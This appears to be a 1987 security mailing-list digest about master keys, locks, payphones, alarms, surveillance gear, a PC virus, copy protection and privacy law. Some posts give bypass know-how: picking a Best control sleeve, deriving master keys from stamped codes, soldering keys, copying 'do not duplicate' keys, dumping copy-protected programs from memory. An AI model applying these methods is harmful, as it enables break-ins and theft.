"Richard Cumbee, chief of campus police, reports that a master key to the College is missing. The key was reported stolen November 5 some time between 10am and 1pm, from a key ring left on a Buildings and Grounds supervisor's desk. According to Cumbee, the key can open approximately 75 percent of the doors on campus. Police have a suspect in the case, and have issued a trespassing warning to the individual. Cumbee stated that police have 'no indication of a history of violence associated with this person.' Cumbee also said that, although the key is at this time not recovered, the police have taken several steps to ensure campus safety. The department is monitoring all reports to see if a master key might be involved. Additionally police notified certain areas of the College to keep on the lookout for suspicious behavior. Cumbee added that no locks will be changed at this point."

I'm of the opinion that it's about time for the college to give serious thought to re-keying the locks involved. I know it's expensive, but I would think that the risks that they are taking by NOT re-keying the locks far outweigh any short-term expense involved. A question for those more well-versed in the design of a large-scale lock installation: am I correct in thinking that it would be within the realm of possibility for our locksmiths to re-do the master keying in such a way as to avoid the need to cut and issue new keys to residents (i.e. change ONLY the master keying)?
Thanks for the information -- and I hope this tale was of some interest. If so, let me know and I'll keep the list updated on what happens.

Phil Wherry, The College of William and Mary (student)
bitnet: #pswher@wmmvs.bitnet
arpanet: psw%wolfgang@gateway.mitre.org
$$$$net: 804-220-9156, 804-253-5512

From: johnson%msuhep.hepnet@LBL.Gov (A Loopy Guy) 18-Nov-1987 11:42:41
To: SECURITY@RED.RUTGERS.EDU
Subj: [1235] Home Locksmith Courses

With all this talk of locksmithing on the net, I thought someone might have an opinion (uh-oh! I'm asking for it) on the worth of the so-called 'home locksmith' courses that one sees advertised in magazines. I have been looking into replacing some locks for a small business I am associated with; granted this is not a difficult task in itself, however, this might be a legitimate excuse to learn something about a topic that I have always been interested in. I would rather not spend a great deal (I do not recall the cost) on a home course, unless I would actually get some sort of certification that would be respected (I don't know what that would be -- maybe certification by a National Association of Locksmiths, or something?). Also, if I go through one of these programs, will I be able to purchase equipment as a legitimate locksmith? I don't want to waste my time, I can do that without spending a lot of dough. If anyone has any experience with these courses, or if someone could recommend a better alternative I would appreciate it.

Thanks in advance,
John Johnson

From: Michael Grant 20-Nov-1987 07:08:32
To: security@red.rutgers.edu, telecom@xx.lcs.mit.edu
Subj: [574] Re: Picking locks on pay phones

I once asked a phoneman emptying one of those safe-like phones about the security of them. He told me that they were alarmed, and that if you open one even with a key at the wrong time, telco will phone the police. I have never verified this though, nor have I ever ripped open a phone and looked for sensors.
Anyone out there had any experience with this? I'm also cc'ing this to telecom.

-Mike

From: fine@gondor.psu.edu (Steve Fine) 22-Nov-1987 19:44:30
To: security@RUTGERS.EDU
Subj: [844] Re: Picking locks on pay phones

Brock Meeks (brock@pnet01.cts.COM) asked if it was true that only one person in the U.S. can pick the lock on a pay phone. I think the uniqueness claim is exaggerated. I read an article (possibly in the Toledo Blade) in the past few years about someone who had been picking locks on pay phones in Ohio. I don't remember the details but I think the person had made a special set of tools that allowed him to pick the lock. Even with the special tools, the phone company claimed that it would take about 20 minutes to open the lock.

--
Steve Fine
Internet: fine@gondor.psu.edu
BITNET: fine@psuvaxg
ARPANET: fine%psuvaxg.bitnet@wiscvm.arpa
UUCP: {allegra|ihnp4|akgua}!psuvax1!gondor!fine

From: gregm%csd4.milw.wisc.edu@csd1.milw.wisc.edu (Gregory Jerome Mumm) 17-Nov-1987 18:55:23
To: misc-security@uunet.uu.net
Subj: [1085] Car alarms

I am curious as to the operation of a normal auto alarm. I know that most of them use some sort of sensor ("black box") that I believe is installed between the battery and the rest of the car. My question: how does this "black box" work? When a door or trunk is opened it triggers this sensor and eventually causes the alarm to go off. I am thinking about building an alarm system when I get time and would appreciate any general advice and a possible circuit diagram of this mysterious "black box". With current draining from the battery when a car is off (dashboard clocks, radio memory etc...) I don't see how a sensor could detect a change in this current.

THANKS

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
( From: gregm@csd4.milw.wisc.edu )
BITNET: gregm%csd4.milw.wisc.edu@wiscvm.bitnet
{seismo|nike|ucbvax|harvard|rutgers!ihnp4}!uwvax!uwmcsd1!uwmcsd4!gregm

From: judice%unxa.DEC@decwrl.dec.com (Louis J. Judice) 22-Nov-1987 16:46:38
To: security@RUTGERS.EDU
Subj: [1527] Why secure systems?

>The resources are no longer terribly scarce but the "oligarchy" continues
>in their ways. For example, on our large IBM a student account is
>assigned about 1MB of disk storage (max.) He can of course try to ask
>for more but the bureaucracy can be very discouraging.

I don't think this is characteristic of "central computing facilities", merely poorly managed or underfunded ones. A key to any customer oriented business is to meet customer needs.

>I notice that many of them have a lot of trouble with the fact
>that they cannot produce accounting charges for ethernets. So they
>find other ways to bang people over the head with the cable
>(restrictions in gateway software, per-port charges etc.)

I doubt that your central computing service is trying to put "port charges", etc. in place simply to extend their monopolistic rule over facilities. Since they probably have this funny thing called a "budget" to work within, the accountants most likely have forced them to find ways to equitably charge out resource usage. I suspect that YOUR department head would have trouble if the comp center came to him/her and said, "oh, we're going to charge your department $40,000 for network usage which we cannot account for..."

I don't think the issue is security in central environments. It's just poorly managed central environments that don't serve user needs!

Lou

From: Larry Hunter 13-Nov-1987 16:47:20
To: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez)
Subj: [2072] Re: night scope

>I am once again asking about this stupid machine. Where can I buy either
>a used or surplus nightscope/ or if available and totally independent
>infrared sniperscope.

I'm not sure what you mean, so I'll tell you about both light amplifiers and infrared devices.
Amplifiers are nice in that they are passive (no one can find you by your light source) and can provide better images, but IR is much cheaper and pretty effective for most applications. They're not as expensive as you might think if you're smart about shopping around. First, if you're looking for second hand stuff, avoid first generation (multi-tube or multi-stage) light amplifiers -- they just don't work that well. Second, try electronics houses that don't specialize in surveillance or police stuff.

Light amplifiers:

SEC (Standard Equipment Company) / 9240 N. 107th St. PO Box 2360 / Milwaukee WI 53224 : NVS-80 75-1200mm monocular night scope (for mounting on a camera) $2795 [If by sniperscope you mean something intended for mounting on a gun (now why would anyone want that?) then try their NVS-520 for $4495]

Edmund Scientific (Great source, low prices!) 101 E. Gloucester Pike Barrington NJ 08007: Night Vision System K31073 75mm including eyepiece $2495

InfraRed stuff:

ETCO Electronics / North County shopping center/ Rt 9 north/ Plattsburgh, NY 12901 : Excellent infrared viewer and source powered by 4 D batteries. Light weight, possible to take excellent photos, field of view about 150 ft. Price is $279, + $10 for a battery pack and $15 for a 10X objective. There may be an even cheaper kit version available now. Great deal!

Edmund also has a variety of IR sources, conversion lenses and viewers. You could add a high power IR source to the ETCO viewer and have a gadget that the "surveillance retailers" sell for $4000+ for less than $500.

Happy viewing....

Larry

From: ISA@ISEC-OA.ARPA 18-Nov-1987 23:33:25
To: SECURITY@RED.RUTGERS.EDU
Subj: [509] AUDIT TRAIL SOFTWARE: HELP !!!!!!!!

I'm looking for a piece of computer software which will allow me to capture all activity of a keyboard on a PC (MS/PC-DOS). It must be able to read the internal clock and create a file which can be hidden and date/time stamp the activity.
Jim Vavrina
Department of the Army
Information Systems Software Center
Security and Intell Division
DDN: ISA@ISEC-OA.ARPA
PHONE: 703-664-3339

From: ejs%acorn@oak.lcs.mit.edu 23-Nov-1987 12:14:12
To: Bill Sommerfeld
Subj: [807] [Re: Why secure systems? ]

> [1] Multics AIM (the access isolation mechanism, a non-discretionary
> access control system), is the only big wart -- it was designed to
> prevent trojan horses from letting classified information escape, and
> instead is probably a big waste of the users' time. It was also
> kludged in after the original design.

Although AIM was added to Multics after the initial design and implementation, it has undergone thorough penetration and functional testing by the DoD and is indeed in active use at at least one DoD installation. Multics has officially been certified at the "B2" level (which requires a mandatory access control (non-discretionary)).

From: Bill Sommerfeld 23-Nov-1987 12:26:43
To: ejs%acorn@oak.lcs.mit.edu, security@red.rutgers.edu
Subj: [548] Re: Why secure systems?

I did mean to imply that AIM caused Multics to be insecure. I meant that AIM probably causes Multics to be _unusable_, at least by people trying to cooperate on a project, and that it is overkill for the problem it tries to solve. It _is_ used on MIT-MULTICS to a certain degree, to keep the backup system from trying to back up a few bad spots on the disks..

- Bill

From: *Hobbit* 2-Dec-1987 10:20:40
To: security
Subj: [2413] virus alert

[This has been all over numerous other mailing lists; some of you may not have seen it yet. _H*]

Virus Invades Lehigh University

Last week, some of our student consultants discovered a virus program that's been spreading rapidly throughout Lehigh University. I thought I'd take a few minutes and warn as many of you as possible about this program since it has the chance of spreading much farther than just our University.
We have no idea where the virus started, but some users have told me that other universities have recently had similar problems.

The virus: the virus itself is contained in the stack space of COMMAND.COM. When a pc is booted from an infected disk, all a user need do to spread the virus is to access another disk via TYPE, COPY, DIR, etc. If the other disk contains COMMAND.COM, the virus code is copied to the other disk. Then, a counter is incremented on the parent. When this counter reaches a value of 4, any and every disk in the PC is erased thoroughly. The boot tracks are nulled, as are the FAT tables, etc. All Norton's horses couldn't put it back together again... :-) This affects both floppy and hard disks. Meanwhile, the four children that were created go on to tell four friends, and then they tell four friends, and so on, and so on.

Detection: while this virus appears to be very well written, the author did leave behind a couple footprints. First, the write date of the command.com changes. Second, if there's a write protect tab on an uninfected disk, you will get a WRITE PROTECT ERROR... So, boot up from a suspected virus'd disk and access a write protected disk - if an error comes up, then you're sure. Note that the length of command.com does not get altered.

I urge anyone who comes in contact with publicly accessible (sp?) disks to periodically check their own disks. Also, exercise safe computing - always wear a write protect tab. :-)

This is not a joke. A large percentage of our public site disks has been gonged by this virus in the last couple days.

Kenneth R. van Wyk, User Services Senior Consultant, Lehigh University Computing Center (215)-758-4988

From: bzs@bu-cs.bu.edu (Barry Shein) 19-Nov-1987 22:58:53
To: security@red.rutgers.edu
Subj: [2273] Student Lab Security and Preventing Trojan Horses

I wonder about all these precautions to stop students from copying software.
I agree that some common practice has to be established like making sure students understand that copying can be construed as a crime, collecting and signing out software (protecting the physical disks and manuals is obviously desirable) and all that. I just wonder what motivates people to spend lord knows how many hours writing magic encrypting loaders and things like that. Did the manufacturers ask you to do this sort of thing? Did you feel that it was the only way to protect yourself from some possible litigation? Did you seek legal counsel from the University before investing all that time and trouble (I assume at the University's expense)? I realize it may have been worthwhile (in your eyes) just to prevent trojan horses, so don't take me wrong, I'm honestly curious.

I suppose the real problem with these systems is that they don't have any rational file protection schemes, I've certainly never been tempted to go to such lengths on systems which did.

I also wonder how much one can just say "hey, if the manufacturers cared about such things they'd do something about it, they can't ask me to subsidize their needs." Copy-protection is not an acceptable "something".

For example, I was at a University level meeting with our Macintosh rep and this very subject came up. Someone in the room started going on and on about schemes to prevent copying. I interrupted and said (in a semi-official tone of voice) the University was more than willing to follow whatever guidelines Apple and/or the software vendors recommend to prevent such potential problems and manage these measures responsibly. But we refuse to show any *more* interest in the problem than the vendors do. If you can supply me with anything written discussing their position on such things I would be more than happy to study it. The apple rep basically nodded his head, I'm not sure because he agreed or just agreed that there was nothing more that could really be said (probably the latter), but it ended there.
-Barry Shein, Boston University

From: oster@dewey.soe.berkeley.edu (David Phillip Oster) 22-Nov-1987 18:11:24
To: misc-security@ucbvax.berkeley.edu
Subj: [1880] Re: Student Lab Security and Preventing Trojan Horses

Derek Andrew, U of Saskatchewan, described a scheme for protecting microcomputer software that uses a separate loader program, so the only image on disk is encrypted. Some commercially released Macintosh music programs were protected using this scheme. I recently received the source code for a desk accessory called FixJT (Fix Jump Table) that removes the copy protection from such programs. Here is how it works:

Since the program must reside in memory in an unprotected form in order to run, and since desk accessories run in parallel, in the same memory space as applications, FixJT just writes out the in-memory image to disk in a form that the operating system can run directly. (It cycles through the Mac's table of executable segments, marking each one as writable, and writing it to disk. It also turns off the handling of clock interrupt tasks, so if the program set a watchdog to try to defeat FixJT, that watchdog won't get triggered.)

Any application program that allows the running of desk accessories and is protected via an external encryption utility can be deprotected by such a scheme. The application must have direct copy protection code built-in, to discover the presence of some non-copiable resource frequently, and continually decrypt one portion of itself to use, and re-encrypt other portions of itself to hide them, so that at no time does a complete, decrypted copy of itself exist in memory, that a watcher desk accessory could just write out.

--- David Phillip Oster            --A Sun 3/50 makes a poor Macintosh II.
Arpa: oster@dewey.soe.berkeley.edu --A Macintosh II makes a poor Sun 3/60.
Uucp: {uwvax,decvax,ihnp4}!ucbvax!oster%dewey.soe.berkeley.edu

From: mdf@gpu.utcs.toronto.edu (Matthew Francey) 22-Nov-1987 22:17:55
To:
Subj: [485] Re: Student Lab Security and Preventing Trojan Horses

> The loader must provide its own security by
                           +++++++++++++

What prevents the student from copying the loader? What prevents the student from disassembling the loader to ascertain the encryption method (um... what method do you use? or is this newsgroup run on a Need To Know basis? :-) ) and/or keys?

-- mdf

From: moss!ihlpf!bird@RUTGERS.EDU (Walters) 23-Nov-1987 13:42:55
To: security
Subj: [943] Driveway Metal Detector

I am very interested in obtaining the schematics for the circuitry that electronically detects cars at left turn lanes, etc. In addition, any building and/or installation tips would be much appreciated. I intend to use the circuit to detect cars pulling into my driveway. During the day it will sound an alarm so my wife will know someone is there. After dark it would also light a yard light for some period of time so as to provide visitors lighted access to the house. I am not interested in where I can buy commercial circuits unless they are implemented by burying wire in the street i.e. Brookstone sells a "tube" one buries in the driveway. The problem here is that the tube is not long enough to assure a car entering my wide driveway would pass over it.

Joe Walters
ihnp4!ihlpf!bird
(312) 979-3091

From: puff!kailhofe@RUTGERS.EDU (Andrew D. Kailhofer) 23-Nov-1987 22:54:00
To: misc-security@RUTGERS.EDU
Subj: [1957] Re: master key security

>What will the administration do if they find such a lock has
>been removed by brute force (ie. saber sawing it out of the door)?
>Surely this implies that the whole master keying system is
>compromised. Ideally, they would rekey all the locks.

Oh, how I know this problem. Within the last few weeks we've had three locks stolen from doors in our building, one with computers all over the place.
A building that is also on a campus that has a pretty smart gang of computer thieves on it. The locks were simply torn out (Sargeant locks). I spent days hiding equipment while we wait for a locksmith to install a few new (good) locks in a few rooms. If they don't get it done by the upcoming holiday, we're doomed. We know they are after a master, the locksmiths know they are after a master, and it makes me soooo mad! The security of my building is compromised, and my babies stand the risk of being gutted, from model A PC's right on up to a 3B15. I just hope that they leave the lock-down cables that will be chopped where they chop them so that we are only stuck with a $250 deductible forced entry replacement instead of a $1K deductible for non-forced entry theft (per item).

Has anyone else out there had this problem? Can anyone else offer any suggestions? We already re-keyed once this decade, so the UW administration isn't likely to consider that as a viable option. Please, Boys! Help me save my wee bairns.

Andrew D. Kailhofer           |507 VanVleck Hall       | This third left
Systems Consultant            |Madison, WI 53706       | blank for reasons
UW-Madison Math Department    |(608) 263-4189          | of national
kailhofe@weaver.math.wisc.edu |I wrote it, it's _mine_!| security (spooks and
...!uwvax!vanvleck!kailhofe   |Bansplaft!              | all that stuff).

From: ssr@tumtum.cs.umd.edu (Dave Kucharczyk) 24-Nov-1987 01:25:59
To: security@red.rutgers.edu
Subj: [1270] Payphone locks

Regarding picking a payphone lock it is possible that this person has made a very special tool that would make it much more likely that one could pick a payphone lock. Payphone locks use a 9 or ten lever, lever lock. The levers are very thin and close together to make picking difficult and also have a ratchet that catches the lever if it is raised too high during picking.
One could make a tension wrench that also allows the resetting of the ratchet, like when a key is inserted but you would have to have a lock from a payphone in the first place. Then one would need a special tool to throw the bolt on the coin box cover, but that is a relatively simple item compared to the tension wrench for the lock.

By the way the coin box is a removable sealed box that has a special seal on it. When the coin collector comes around he pulls the full box out which closes itself as it is extracted from the actual payphone housing. He then inserts an empty and open box back into the housing which then primes it so that upon removal it seals itself until it is reset, which can only be done by breaking the seal on the box.

ssr

From: murray@andromeda.rutgers.edu (Murray Karstadt) 23-Nov-1987 16:59:33
To: security@red.rutgers.edu
Subj: [277]

A little while ago someone mentioned Check-Point Security Systems ( to prevent the rip off of software) does anyone know where I can find these people

murray

From: len@csd4.milw.wisc.edu (Leonard P Levine) 24-Nov-1987 18:25:17
To: misc-security@uunet.uu.net
Subj: [1182] Re: master key security

>It must be very expensive to rekey all the locks on a campus.

It is. Here at UWM when the college rekeyed one building with 80 faculty offices and some 40 labs, the cost was of the order of $25,000.

The problem with master keys being lower than the sub masters deals with the way the keys are installed by the locksmith. S/he "builds" the keyset by inserting a master key in the lock cylinder and adding slugs for the local and submaster set, finally adding the slugs needed to make the master. The cylinder then is flat across the top and may be inserted into the stationary door part. If the master was higher than the submaster, the locksmith would have to make several keys for the building of the cylinders. Lethargy rules, the master is low and easy to make from any submaster.
An even easier way to bust the system is to take the keys, usually marked "do not duplicate" to a shop for duplication, after taping over the above marks with a legend such as "elevator" or "garage". Most shops will gladly duplicate such a key.

From: jslove%starch.DEC@decwrl.dec.com (J. Spencer Love) 25-Nov-1987 02:29:42
To: security@Red.Rutgers.Edu, JSLOVE@decwrl.dec.com
Subj: [3417] Re: Internal setscrews

The "from the inside" setscrews don't protect padlocks, which are by far the most vulnerable locks in most Best and Falcon systems. As many bicycle owners know, cutters which can remove a padlock from a hasp are too easy to come by, and the words "hardened steel" are essentially irrelevant. One way to deal with this problem is to use a separate control key and mastering system for padlocks and other unsupervised areas.

The control key is implemented as a sleeve around the plug, where the plug is the part of the lock which rotates when the lock is normally operated. This sleeve is about 1/8" thick for the part which faces the opposing circle of the figure 8 profile of a Best lock, and includes the tooth which holds the core into the lock. This describes a bit more than 60 degrees of the sleeve; the other 300 degrees are also present, but the metal is much thinner, and thus less noticeable. The sleeve along the bottom of the keyway typically has five or six small holes (one under each pin), which may be intended for use by the locksmith when assembling or rekeying a core. These small holes permit making a specialized wrench to apply torque to the sleeve without applying torque to the plug. Such a tool makes it relatively easy to pick the sleeve, thus removing the core. The core operates in only one direction, turning about 20 degrees, since the tooth must withdraw into empty space within the core. The Best locks are well made, so it is easy to disassemble and reassemble them. Penetrating such a system can be done without property damage.
If the system stamps a code on each lock and key, it is often possible to derive the whole system by examining two or three keys and a single lock. This could be made more difficult by assigning the codes non-sequentially, but the systems which I have seen didn't do this.

The Best locks that I have seen have 5, 6 or 7 pins, each of which has 10 possible stopping points 1/80" apart. Because the thinnest master pin is 1/40" thick (to keep from turning sideways), only the even or odd numbered stops are used by any given pin (but the control key can violate this). With one stop reserved for the grand master, 4 stops per pin are available for pass keys. The master key has at least one cut which has more metal than any pass key, so that grinding the keys down never can produce a master key. When submasters are provided, the grand master can't be made from any submaster, and so on. However, metal can be added to a key using silver solder, which can easily be filed down and has a reasonable lifetime (regular solder is too soft, so the lifetime would be only a few uses). The solder makes the key rather conspicuous when the campus cop asks to see your key ring, though. I think you would need acid-core solder; it's been a while.

The usual disclaimer applies: don't try this at home, it's illegal. Knowing how to pick locks is only illegal if you exercise the skill on someone else's lock, but there are places where possession of the tools without a license (a locksmith's bond, or some such) is a felony. It can be a very useful skill in emergencies where forgiveness is easier to obtain than permission; every boy scout should have a locksmithing merit badge.

From: Larry Hunter 25-Nov-1987 14:42:03
To: MCGUIRE%GRIN2.BITNET@YALE.ARPA
Subj: [3484] RE: Bumper Beepers.

>And by the way, US Citizens have no reasonable expectation of privacy
>regarding movements tracked in public, said the Supreme Court in 1983:
>US v. Knotts, 103 S. Ct. 1081 (1983).
>
>However, I imagine that installing a beeper on someone else's car without
>their knowledge or permission is trespassing at the very least.

That's an interesting question! US v. Knotts was a case in which the police attached a bumper beeper to a car and followed it. It was held that there was no violation of the 4th amendment because there is no reasonable expectation of privacy of movements in public. There was a case decided shortly thereafter where a beeper was placed inside a package (containing drugs, I believe) and the police followed the package and then traced its location inside the suspect's home. That search was overturned because the suspect did have a reasonable expectation of privacy inside his home: US v. Karo 104 S. Ct. 3296 (1984) "Monitoring of a beeper to trail a container into a house and... keep[ing] in touch with it inside the house... did violate the 4th amendment."

Now as to leaving a bumper beeper on someone else's car: There are things that the police can do that others can't, but I don't think trailing cars with gadgets is one of them. I'd guess that it is legal for anyone to use a bumper beeper for trailing a car in public. It's hard to imagine a criminal charge coming out of trailing a car. Trespass isn't appropriate since there is no entering the car, and assuming the beeper was placed when the car was parked on a city street and not in the guy's garage, there's no real property trespass either. If someone gets mud on your bumper he hasn't trespassed -- likewise if he puts a gadget there. You're not monitoring communication, so none of the wiretapping laws would help. Since there is no reasonable expectation of privacy as to movements, you're not violating the target's civil rights, either. There might be a shot at a vandalism charge, but he'd have to show that the beeper damaged the car in some way.
Damages might arise from the result of being trailed and maybe the beeper could be worked into a civil suit -- juries probably wouldn't like the idea of following someone by bumper beeper too much and might think the follower was a bad guy, but then again it might not be treated as relevant evidence; it probably depends on the skill of the lawyers involved.

I'm not a lawyer, so I wouldn't take this as the last word, but I am pretty familiar with the laws about privacy in the US and it seems to me that putting a bumper beeper on and following someone's car is completely legal. I think this is wrong, but that doesn't make it illegal. It is probably not the case that you could put a similar device on the person or some other possession of his, because if you "keep in touch with" it (whatever that means) while he is inside his house, you have violated his civil rights. Your car is not a domain where you have much in the way of privacy rights.

Note: It is probably the case that you are abandoning the beeper when you put it on the car, so if the target finds the beeper it's his to do with as he pleases (I'd put it on a truck heading someplace remote and see who follows...)

Larry

From: Fred Blonder 25-Nov-1987 11:38:58
To: dnichols%ti-csl%csnet-relay.CSNET@RELAY.CS.NET
Subj: [520] Re: Home security

>... I have two young children and a cat and small dog which make a
>motion detector pretty unusable.

Not necessarily true. The infra-red motion detectors can be adjusted to ignore reasonably small house pets. As for the kids: just use the system when there're no humans home.

----
Fred Blonder (301) 454-7690
seismo!mimsy!fred
Fred@Mimsy.umd.edu

From: ejs%acorn@oak.lcs.mit.edu 27-Nov-1987 15:37:28
To: Bill Sommerfeld
Subj: [2454] [Re: [Re: Why secure systems? ]]

> I did mean to imply that AIM caused Multics to be insecure.

I assume you mean "didn't" above, right?
> I meant that AIM probably causes Multics to be _unusable_, at least by
> people trying to cooperate on a project, and that it is overkill for
> the problem it tries to solve.

I used AIM at the Pentagon for 4 years. Indeed in some circumstances it was cumbersome, but effective. Typically, a project is associated with one security classification, and one can "log in" at one level to work on it. The real problems come when one is logged in, say, at the Top Secret level, and wants to modify a file at the Secret level. If he copies the file from the Secret (directory) hierarchy to the Top Secret hierarchy, the system treats the data as Top Secret and a security officer must intervene to downgrade it at a later time. His only real alternative is to create a new process at the lower authorization. Yes, this is a pain, but I don't see many other alternatives. But I don't agree that AIM renders the system unusable -- at least not in an environment where mandatory access control levels (like the military or government) are in place. In private industry, perhaps, AIM is overkill.

AIM is also a real pain when such per-user databases such as profiles, init files, and mailboxes are concerned. The former two must be maintained at the lower classification/authorization level and modified only at that level -- a burden for most. Mailboxes on Multics, being multi-level, force the user to log in at the highest authorization to read all the messages, but prevent him from deleting old messages at any level but the level at which the message was sent (or destined). This is also an inconvenience.

> It _is_ used on MIT-MULTICS to a certain degree, to keep the backup
> system from trying to back up a few bad spots on the disks..

That is certainly a bizarre use of AIM and one which makes my stomach turn (having worked on the Multics security effort at Honeywell for some time).
There are, however, other Multics sites using AIM, including some in the university environment, where grade protection was considered a suitable need for AIM.

Take care.

-- Eric

PS: I no longer subscribe to the security mailing list, so any reply mail should be cc'ed to me, directly.

From: judice%unxa.DEC@decwrl.dec.com (Louis J. Judice) 28-Nov-1987 10:02:27
To: security@RUTGERS.EDU
Subj: [1407] re: why secure systems?

>The resources are no longer terribly scarce but the
>"oligarchy" continues in their ways. For example, on our large IBM a
>student account is assigned about 1MB of disk storage (max.) He can
>of course try to ask for more but the bureaucracy can be very discouraging.

I don't think this is characteristic of "central computing facilities", merely poorly managed or underfunded ones. A key to any customer oriented business is to meet customer needs.

>So they find other ways to bang people over the head with the cable
>(restrictions in gateway software, per-port charges etc.)

I doubt that your central computing service is trying to put "port charges", etc. in place simply to extend their monopolistic rule over facilities. Since they probably have this funny thing called a "budget" to work within, the accountants most likely have forced them to find ways to equitably charge out resource usage. I suspect that YOUR department head would have trouble if the comp center came to him/her and said, "oh, we're going to charge your department $40,000 for network usage which we cannot account for..."

I don't think the issue is security in central environments. It's just poorly managed central environments that don't serve user needs!

Lou

From: Larry Hunter 30-Nov-1987 12:58:20
To: Jonathan Harris
Subj: [6042] Re: SSN

In reply to the few examples people brought up of how someone can destroy you with a knowledge of your SSN:

>(1) The activities--getting the false drivers license, using it to obtain
>information about you, etc... are all serious criminal offenses. The abuser
>would cause you some hassles, which you would eventually clear up, and
>eventually find himself in jail with felonies on his record, drunk
>driving, etc....

This is a bit naive. First, although using false identification is a crime, it is not a serious one in most states. Using false information to obtain a credit card is also a crime, although again, credit card fraud is not a high priority for most police departments. Winning a civil suit is always possible in the case of fraud, but it would be difficult and expensive for a victim to track down and prosecute the perpetrator.

Second, the idea that all this might cause the victim "some hassles, which you would eventually clear up" is simply wrong. People can get badly hurt by this stuff. Here's a recent court case that should frighten you:

A Federal Judge in Los Angeles has confirmed a Michigan man's account of his three year nightmare of police arrests based on an error in the FBI's computer. The judge has ordered the police department that originated the error to pay the man damages.

The nightmare of Terry Rogan of Saginaw began in 1981, when an escapee from an Alabama prison received a copy of Rogan's birth certificate from a mutual acquaintance. The escapee assumed Rogan's identity and obtained a California driver's license in Rogan's name. The man was eventually arrested in LA on suspicion of murder. The suspect was released, but LA police later issued a murder arrest warrant in the name of Terry Rogan. Omitted from the warrant, however, were the suspect's known physical characteristics, including a tattoo.

If Terry Rogan, back home in Michigan, were the sort of fellow who never has a confrontation with the police, the erroneous warrant probably would have done him no harm. But Terry Rogan is black. Black males in urban areas have a probability of being arrested far greater than that of any other segment of the population. In 1982, Rogan was accused of trespassing by police in Saginaw county.
He was then arrested on charges of resisting arrest. In accord with ususal policy, police queried the FBI's National Crime Information Center under Rogan's name. They got back a "hit," the California warrant in Rogan's name. The NCIC entry had no other identifying information even though, according to the court, the system permits up to 121 characters to be entered for this purpose. After comparing fingerprints and discovering from LA that the wanted man had a tattoo and that Rogan did not, police released him -- four days later. But within a few weeks, LA police reentered the Rogan name into NCIC. Within six months Rogan was stopped near his home for failing to use a turn signal. Officers ran a computer check on him, and again the murder warrant showed up. Rogan was searched, handcuffed at gunpoint and then arrested. Rogain was arrested again, this time for a traffic offense, and was again detained until the LA arrest warrant was explained. Rogan then asked an FBI agent in Saginaw to correct the entry; he was told to go to Los Angeles to do it himself. He was also told to write his Congressman. In July 1983 Rogan travelled to Texas to find work; there he was stopped for speeding. Again, because of the NCIC "hit," he was handcuffed at gunpoint and taken to jail. At about this time, LA police again reentered the warrant into NCIC. Not surprisingly, in January 1984, Rogan was again apprehended at gunpoint, this time for driving without his headlights on, back home in Saginaw. By then local police officers knew all about the unfortunate Terry Rogan. He was promptly released. But no one would make the effort to correct the FBI entry. It took a reporter from the "Saginaw News" to initiate the erasure process. The NCIC record was deleted, and the felon in Alabama was eventually convicted of the LA homicide. 
The LA police department gave officers operating their end of the NCIC system no training in how to delete or amend data once they had entered it into the system, according to US District Judge Robert J. Kelleher. Neither of the two officers involved thought about amending the NCIC record after they were notified of Rogan's mistaken identity.. One officer's policy in these situations, the court said, "was to give the innocent person a computer printout of the warrant and his business card as evidence of the person's innocence ONLY IF the person came to Los Angeles and picked up the items personally." ... The court found the City of Los Angeles liable for damages to Rogan, calling its conduct "both grossly negligent and systemic in nature" in depriving Rogan of his constitutional right to be free of faulty warrants. Rogan v. Los Angeles 85-0989 (CD Cal, 20 July 1987) [The preceding is quoted, with permission, from the Privacy Journal, an excellent publication available for $98/year from Box 15300 Washington DC 20003.] Notice that all that trouble arose merely over use of the name. With a social security number, it is possible that credit records could also become involved. Victims of this kind of activity are badly hurt -- no doubt about it. If instead of a police mistake, it had been the actions of an private individual that had caused the trouble, the chances of compensation would be remote. Compared to having a car vandalized, being repeatedly arrested at gunpoint, spending days in jail (very unpleasant!), loss of credit rating, etc. seem much more serious. Never underestimate the power of those 9 digits. Larry From: Jonathan Harris 30-Nov-1987 15:18:59 To: hunter-larry@YALE.ARPA Subj: [2648] Re: SSN Larry, "A bit naive" may be accurate if you want to spend your life worrying about getting hit by meteors and all sorts of other remote problems. 
Although not as serious as murder, credit card fraud and obtaining a false id will cause the perpetrator serious trouble of various kinds. I am pretty sure in the example listed, the crimes are felonies, although not extremely serious ones. Once convicted the guilty party will have a very difficult time obtaining any job where any degree of trust is involved, especially with the increase in the usage of background checks, etc. Of course there are people so messed up that they don't care about this kind of thing, as in the case you mentioned where the original perpetrator was a prison escapee.

Injustice has happened before there were computers and widespread usage of SSN's. I am sure that we will still have to continue fighting these cases as long as there is civilization. However the possibility of the kind of hassle mentioned in the article to which I replied is probably less than that of being hit by a car, robbed at gunpoint, or harassed in a more "traditional" manner. It is rather pointless to end up with high blood pressure, heart disease, depression, and lost productivity because you spend half of your life fighting the phone companies or someone else's usage of your SSN or any other number.

In response to your closing statement that having your credit rating trashed is worse than having your car vandalized: that is true if you have your car vandalized only once and collect the insurance. There are plenty of cases of people's lives being made miserable by repeated harassment, firebombings, beatings, etc... Frankly I would much rather be suing TRW to get my credit rating restored than visiting a close family member in the hospital or worse the morgue. I know of people who have been forced out of their homes and killed or wounded as a result of "non-computer" harassment.

--Jonathan

---------------------------------------------------------------------
Jonathan G. Harris                 Bitnet addresses: jghha8r@uchimvs1
The James Franck Institute                           harris%go-han@uchicago
The University of Chicago          arpanet:   harris@go-han.uchicago.edu
5640 S. Ellis Avenue               alternate: harris@oddjob.uchicago.edu
Chicago, Illinois 60637            ...!oddjob!go-han!harris
(312)702-7234                      numerical  harris@128.135.4.20

From: brad@sun.com (Brad Taylor) 30-Nov-1987 19:51:37
To: misc-security@uunet.uu.net
Subj: [1285] Re: something of some interest, subject: breaking DES

Just a correction, in case people get the wrong idea:

> the reason i mentioned it to van was that sun has now done two talks
> at meetings about their security on the network that is based on
> des using the diffie hellman key exchange in exactly the field
> that we broke. both times the talk was given by the programmer
> who is implementing it not the mathematician who decided what to
> be implemented. i pointed them again to the papers on it; hope
> a number theorist there actually reads them.

